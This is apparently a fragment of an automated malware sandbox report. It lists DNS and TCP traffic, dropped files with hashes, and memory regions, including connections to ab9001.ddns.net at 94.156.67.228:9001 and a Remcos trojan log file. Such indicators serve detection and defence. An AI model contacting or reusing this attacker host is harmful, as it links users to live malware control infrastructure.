| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| NL | 94.156.67.228:9001 | ab9001.ddns.net | tcp |
| NL | 94.156.67.228:9001 | ab9001.ddns.net | tcp |
| US | 8.8.8.8:53 | 247.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.19.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.173.189.20.in-addr.arpa | udp |
Files
memory/2168-0-0x00007FFE24C43000-0x00007FFE24C45000-memory.dmp
memory/2168-1-0x0000020E27640000-0x0000020E27662000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5svx45gr.ku2.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2168-11-0x00007FFE24C40000-0x00007FFE25701000-memory.dmp
memory/2168-12-0x00007FFE24C40000-0x00007FFE25701000-memory.dmp
memory/784-15-0x0000000004500000-0x0000000004536000-memory.dmp
memory/784-16-0x0000000004B80000-0x00000000051A8000-memory.dmp
memory/784-17-0x0000000004B20000-0x0000000004B42000-memory.dmp
memory/784-18-0x00000000052E0000-0x0000000005346000-memory.dmp
memory/784-19-0x0000000005350000-0x00000000053B6000-memory.dmp
memory/784-29-0x00000000054D0000-0x0000000005824000-memory.dmp
memory/784-30-0x00000000059D0000-0x00000000059EE000-memory.dmp
memory/784-31-0x0000000005A10000-0x0000000005A5C000-memory.dmp
memory/784-32-0x0000000007260000-0x00000000078DA000-memory.dmp
memory/784-33-0x0000000006C20000-0x0000000006C3A000-memory.dmp
memory/784-34-0x0000000006DE0000-0x0000000006E76000-memory.dmp
memory/784-35-0x0000000006D40000-0x0000000006D62000-memory.dmp
memory/784-36-0x0000000007E90000-0x0000000008434000-memory.dmp
C:\Users\Admin\AppData\Roaming\Narco.Fla
| MD5 | 5b31fdcca43851229c6ad5c0d5124d9e |
| SHA1 | 95243324bfd6acd008518e233e5ac3a7a29e67a5 |
| SHA256 | c288a9c83ad9236a539faddaaa2d90d0beb42cc28c9b2f8009676ccd15b6b842 |
| SHA512 | e4446a71ba0ce278980fdb6d286b55adcc97dd5b5a3c36da978de06916846bcc05cdf6ce8adb4176693b1d896c8ddd5499e37ab3ab08e8bac7468495c84038f5 |
memory/784-38-0x0000000008440000-0x000000000B10B000-memory.dmp
memory/2168-39-0x00007FFE24C40000-0x00007FFE25701000-memory.dmp
memory/2168-46-0x00007FFE24C43000-0x00007FFE24C45000-memory.dmp
memory/2168-57-0x00007FFE24C40000-0x00007FFE25701000-memory.dmp
memory/3680-54-0x0000000001C70000-0x000000000493B000-memory.dmp
memory/2088-62-0x0000000000400000-0x0000000000478000-memory.dmp
memory/5072-64-0x0000000000400000-0x0000000000457000-memory.dmp
memory/2088-66-0x0000000000400000-0x0000000000478000-memory.dmp
memory/5072-65-0x0000000000400000-0x0000000000457000-memory.dmp
memory/2088-63-0x0000000000400000-0x0000000000478000-memory.dmp
memory/5044-73-0x0000000000400000-0x0000000000424000-memory.dmp
memory/5072-72-0x0000000000400000-0x0000000000457000-memory.dmp
memory/5044-71-0x0000000000400000-0x0000000000424000-memory.dmp
memory/5044-70-0x0000000000400000-0x0000000000424000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\bmnddfrn
| MD5 | 365f45018b7bcc98591979d6c4b23752 |
| SHA1 | 073aff125450845105f5daa7d0e7cc24ee8bbca5 |
| SHA256 | 27be905cdbf87c23851d00d61afd5fcfe5c72b1de227ac7d8c0dc5c7583c9a6e |
| SHA512 | 4bd0d2266c624b9ad40e9ba6cb4d63debd12f46f5c27afae3bfc20e3e7f5e9f9c88f83151166324223c5889034a4d70652cf747f6943af011191c64c28e18703 |
memory/3680-78-0x0000000020CC0000-0x0000000020CD9000-memory.dmp
memory/3680-81-0x0000000020CC0000-0x0000000020CD9000-memory.dmp
memory/3680-82-0x0000000020CC0000-0x0000000020CD9000-memory.dmp
C:\Users\Admin\remcos\logs.dat
| MD5 | 431cd2536a190a1c4f7b0038f9fa3e46 |
| SHA1 | d7b7dc357b619008284bb09d56b88b6ab8f74eb3 |
| SHA256 | 6cdb5757c487eb32b35e86e1c86725f55a8c443ceffd0adbf2f9ae54a44b762c |
| SHA512 | 4135eb3f0c395abc29e419d34c1ad2e34d98b3cf1042e53b0301e6293a05f343e27a04928702a08a9ac00bb889bddd4cf2fb0977a8abf6ff9706afa337387325 |